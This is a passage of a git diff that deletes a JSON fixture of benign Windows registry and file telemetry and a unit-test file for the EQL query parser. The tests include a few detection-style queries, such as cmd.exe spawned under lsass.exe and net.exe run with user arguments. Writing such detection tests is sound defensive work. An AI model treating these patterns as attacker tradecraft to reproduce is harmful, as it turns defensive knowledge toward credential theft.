"C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", - "registry_value": "Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", - "timestamp": 131883574055580000, - "unique_pid": 
"{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574055580000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574055740000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574055740000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574055740000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574055740000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "timestamp": 131883574055740000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574055740000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - 
"registry_value": "NewClientID", - "timestamp": 131883574056050000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883574056050000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "file", - "file_name": "AUDIODG.EXE-D0D776AC.pf", - "file_path": "C:\\Windows\\Prefetch\\AUDIODG.EXE-D0D776AC.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574076520000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883574081680000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883574081680000, - "unique_pid": 
"{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883574085740000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574085740000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883574149810016, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": 
"vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883574149810016, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883574149810016, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574190430000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574190430000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574190430000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574191360000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574191520000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883574191990000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883574191990000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": 
"svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_value": "VFUProvider", - "timestamp": 131883574200270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", - "registry_value": "StartTime", - "timestamp": 131883574200270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574216680000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 
131883574216680000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574216680000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574216830000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574216830000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574216830000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000B053C", - "registry_value": "W32:00000000000B053C", - "timestamp": 131883574217619984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000B053C", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000B053C\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574217619984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - } -] \ No newline at end of file diff --git a/tests/test_eql.py b/tests/test_eql.py deleted file mode 100644 index f73bc23..0000000 --- a/tests/test_eql.py +++ /dev/null 
@@ -1,697 +0,0 @@ -"""Test case.""" -import datetime -import os -import sys -import traceback -import unittest -from collections import OrderedDict - -from eql.ast import * # noqa -from eql.engines.base import BaseEngine, TextEngine -from eql.errors import ParseError, SchemaError -from eql.parser import ( - parse_query, parse_expression, parse_definition, parse_definitions, parse_analytic, get_preprocessor -) -from eql.schema import use_schema - - -class TestEql(unittest.TestCase): - """Test EQL parsing.""" - - def test_abstract_methods(self): - """Test that abstract methods are raising exceptions.""" - node = EqlNode() - self.assertRaises(NotImplementedError, node.render) - - macro = BaseMacro("name") - self.assertRaises(NotImplementedError, macro.expand, []) - - def test_invalid_ast(self): - """Test that invalid ast nodes raise errors.""" - self.assertRaises(AssertionError, Literal, True) - self.assertRaises(AssertionError, Literal, dict()) - self.assertRaises(AssertionError, Literal, list()) - self.assertRaises(AssertionError, Literal, complex()) - self.assertRaises(AssertionError, Literal, object()) - self.assertRaises(AssertionError, Literal, lambda: None) - self.assertRaises(AssertionError, Literal, object) - - def test_literals(self): - """Test that literals are parsed correctly.""" - eql_literals = [ - ('true', True, Boolean), - ('false', False, Boolean), - ('100', 100, Number), - ('1.5', 1.5, Number), - ('.6', .6, Number), - ('-100', -100, Number), - ('-15.24', -15.24, Number), - ('"100"', "100", String), - ('null', None, Null), - ] - for text, expected_value, expected_type in eql_literals: - node = parse_expression(text) - rendered = node.render() - re_parsed = parse_expression(rendered) - self.assertIsInstance(node, expected_type) - self.assertEqual(node.value, expected_value) - self.assertEqual(node, re_parsed) - - def test_valid_expressions(self): - """Test that expressions are parsed correctly.""" - valid = [ - "1 == 1", - "1 == (1 == 1)", - 'abc != 
"ghi"', - "abc > 20", - "f()", - "somef(a,b,c,d,)", - "a in (1,2,3,4,)", - "f(abc) < g(hij)", - "f(f(f(f(abc))))", - 'abc == f()', - 'f() and g()', - "1", - '(1)', - "true", - "false", - "null", - "not null", - "abc", - '"string"', - 'abc and def', - '(1==abc) and def', - 'abc == (1 and 2)', - 'abc == (def and 2)', - 'abc == (def and def)', - 'abc == (def and ghi)', - '"\\b\\t\\r\\n\\f\\\\\\"\\\'"', - ] - - for query in valid: - parse_expression(query) - - def test_functions(self): - """Test that functions are being parsed correctly.""" - # Make sure that functions are parsing all arguments - fn = parse_expression('somefunction(' - ' a and c,' - ' false,' - ' d or g' - ')') - self.assertIsInstance(fn, FunctionCall) - self.assertEqual(len(fn.arguments), 3) - - def test_invalid_expressions(self): - """Test that expressions are parsed correctly.""" - invalid = [ - 'a xor b', # made up comparator - 'def[ghi]', # index not a number - 'def[-1]', # negative indexes not supported - 'someFunc().abc', # can't index these - '1.2.3', # invalid number - 'a.1', - '()', # nothing inside - '', - '"invalid"string"', - '--100', - '1000 100', - '"" 100', - # literal values as fields - 'true.100', - 'null.abc', - 'abc[0].null', - # require escape slashes, - '\\R', - '\\W', - ] - - keywords = [ - 'and', 'by', 'in', 'join', 'macro', 'not', 'of', 'or', 'sequence', 'until', 'where', 'with' - ] - - for query in invalid: - self.assertRaises(ParseError, parse_expression, query) - - for keyword in keywords: - self.assertRaises(ParseError, parse_expression, keyword) - parse_expression(keyword.upper()) - - def test_valid_queries(self): - """Make sure that EQL queries are properly parsed.""" - valid = [ - 'file where true', - 'file where true and true', - 'file where false or true', - 'registry where not pid', - 'process where process_name == "net.exe" and command_line == "* user*.exe"', - 'process where command_line == "~!@#$%^&*();\'[]{}\\\\|<>?,./:\\"-= \' "', - 'process where \n\n\npid ==\t 
4', - 'process where process_name in ("net.exe", "cmd.exe", "at.exe")', - 'process where command_line == "*.exe *admin*" or command_line == "* a b*"', - 'process where pid in (1,2,3,4,5,6,7,8) and abc == 100 and def == 200 and ghi == 300 and jkl == x', - 'process where ppid != pid', - 'image_load where not x != y', - 'image_load where not x == y', - 'image_load where not not not not x < y', - 'image_load where not x <= y', - 'image_load where not x >= y', - 'image_load where not x > y', - 'process where pid == 4 or pid == 5 or pid == 6 or pid == 7 or pid == 8', - 'network where pid == 0 or pid == 4 or (ppid == 0 or ppid = 4) or (abc == defgh) and process_name == "*" ', - 'network where pid = 4', - 'process where descendant of [process where process_name == "lsass.exe"] and process_name == "cmd.exe"', - 'join \t\t\t[process where process_name == "*"] [ file where file_path == "*"\n]', - 'join by pid [process where name == "*"] [file where path == "*"] until [process where opcode == 2]', - 'sequence [process where name == "*"] [file where path == "*"] until [process where opcode == 2]', - 'sequence by pid [process where name == "*"] [file where path == "*"] until [process where opcode == 2]', - 'join [process where process_name == "*"] by process_path [file where file_path == "*"] by image_path', - 'sequence [process where process_name == "*"] by process_path [file where file_path == "*"] by image_path', - 'sequence by pid [process where process_name == "*"] [file where file_path == "*"]', - 'sequence by pid with maxspan=200 [process where process_name == "*" ] [file where file_path == "*"]', - 'sequence by pid with maxspan=2s [process where process_name == "*" ] [file where file_path == "*"]', - 'sequence by pid with maxspan=2sec [process where process_name == "*" ] [file where file_path == "*"]', - 'sequence by pid with maxspan=2seconds [process where process_name == "*" ] [file where file_path == "*"]', - 'sequence with maxspan=2.5m [process where x == x] by pid 
[file where file_path == "*"] by ppid', - 'sequence by pid with maxspan=2.0h [process where process_name == "*"] [file where file_path == "*"]', - 'sequence by pid with maxspan=2.0h [process where process_name == "*"] [file where file_path == "*"]', - 'sequence by pid with maxspan=1.0075d [process where process_name == "*"] [file where file_path == "*"]', - 'dns where pid == 100 | head 100 | tail 50 | unique pid', - 'network where pid == 100 | unique command_line | count', - 'security where user_domain == "endgame" | count user_name a b | tail 5', - 'process where 1==1 | count user_name, unique_pid, myFn(field2,a,bc)', - 'process where 1==1 | unique user_name, myFn(field2,a,bc), field2', - 'registry where a.b', - 'registry where a[0]', - 'registry where a.b.c.d.e', - 'registry where a.b.c[0]', - 'registry where a[0].b', - 'registry where a[0][1].b', - 'registry where a[0].b[1]', - 'registry where topField.subField[100].subsubField == 0', - 'process where true | filter true', - 'process where 1==1 | filter abc == def', - 'process where 1==1 | filter abc == def and 1 != 2', - 'process where 1==1 | count process_name | filter percent > 0.5', - 'process where a > 100000000000000000000000000000000', - 'any where true | unique a b c | sort a b c | count', - 'any where true | unique a, b, c | sort a b c | count', - 'any where true | unique a, b, c | sort a,b,c | count', - 'any where true | window 5s | unique a, b | unique_count a | filter count > 5', - 'file where child of [registry where true]', - 'file where event of [registry where true]', - 'file where event of [registry where true]', - 'file where descendant of [registry where true]', - # multiple by values - 'sequence by field1 [file where true] by f1 [process where true] by f1', - 'sequence by a,b,c,d [file where true] by f1,f2 [process where true] by f1,f2', - 'sequence [file where 1] by f1,f2 [process where 1] by f1,f2 until [process where 1] by f1,f2', - 'sequence by f [file where true] by a,b [process where 
true] by c,d until [process where 1] by e,f', - # sequence with named params - 'sequence by unique_pid [process where true] [file where true] fork', - 'sequence by unique_pid [process where true] [file where true] fork=true', - 'sequence by unique_pid [process where true] [file where true] fork=1', - 'sequence by unique_pid [process where true] [file where true] fork=false', - 'sequence by unique_pid [process where true] [file where true] fork=0 [network where true]', - 'sequence by unique_pid [process where true] [file where true] fork=0', - ] - - datetime.datetime.now() - - for i, text in enumerate(valid): - try: - query = parse_query(text) - rendered = query.render() - self.assertEqual(text.split()[0], rendered.split()[0]) - - # parse it again to make sure it's still valid and doesn't change - parse_again = parse_query(rendered) - rendered_again = parse_again.render() - - # repr + eval should also restore it properly - # Test that eval + repr works - actual_repr = repr(query) - eval_actual = eval(actual_repr) - - self.assertEqual(query, parse_again, "Query didn't reparse correctly.") - self.assertEqual(rendered, rendered_again) - self.assertEqual(query, eval_actual) - - except ParseError: - ex_type, ex, tb = sys.exc_info() - traceback.print_exc(ex) - traceback.print_tb(tb) - self.fail("Unable to parse query #{}: {}".format(i, text)) - - def test_invalid_schema(self): - """Test that schema errors are being raised separately.""" - invalid = [ - 'fakeNews where president == "russia"', - 'PROCESS where process_name == "bad.exe"', - 'Process where process_name == "bad.exe"', - 'file_ where process_name == "bad.exe"', - ] - for query in invalid: - self.assertRaises(SchemaError, parse_query, query) - - def test_invalid_queries(self): - """Test that invalid queries throw the proper error.""" - invalid = [ - 'process where process_name == "abc.exe" garbage extraneous \"input\"', - 'garbage process where process_name < "abc.e"xe"', - 'process', - 'process where abc == 
